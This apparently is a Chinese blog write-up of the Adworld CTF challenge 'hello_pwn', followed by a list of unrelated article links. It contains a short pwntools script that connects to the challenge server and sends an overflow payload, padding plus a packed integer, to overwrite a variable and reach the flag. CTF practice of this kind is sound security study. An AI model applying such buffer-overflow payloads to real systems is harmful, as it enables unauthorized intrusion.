*pwn*练习2——攻防世界-hello

pwn练习2——攻防世界-hello_pwn

read读入10个字节，进行覆盖

和之前那个差不多

# -*- coding: utf-8 -*-
from pwn import *
kubopiy=remote("220.249.52.133",53402)#进行连接
payload=b'a'*(0x6c-0x68)+p64(1853186401)#b是字节，填入这么多的a，再加一个打包好的1853186401
kubopiy.recvuntil("lets get helloworld for bof")#接收到那一句话
kubopiy.sendline(payload)
kubopiy.interactive()

得到flag

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/kubopiy/p/13564321.html

推荐文章
tar 增量备份
linux git工具使用
lua杂项
SQL小白点滴（一）含”聚合函数“等
收藏收藏，赶紧的。
点滴（二）
WebService编程笔记（一）
[SQL小白]技巧随得
代码点滴收获（2010年2月）
SQL SERVER 2005卸载全纪录
[转]WCF Service中HttpContext.Current为null的解决办法
在asp.net webfrome,为button添加一个确定提示框
卸载安装SQL Server2005时出现性能计数器错误
SL学习笔记 Navigation Framework
创建目录及子目录记一次文件整理
求100以内的质数
求职技术题目收集④ 设计模式
软件测试工程师面试start
Linq 随机排序的几种方案。
根据模板发送邮件
开发自定义控件步骤
asp.net后台调用前台js代码
使用ResolveUrl设置相对路径
JavaScript获取后台C#变量以及调用后台方法
使用jquery的验证插件进行客户端验证
参数化的模糊查询
使用Microsoft Enterprise Library 5.0记录日志信息
我的Ajax学习笔记
我的工作問題集(VS2005)
存储过程从入门到精通(转载)

*pwn*练习2——攻防世界-hello_pwn

pwn练习2——攻防世界-hello_pwn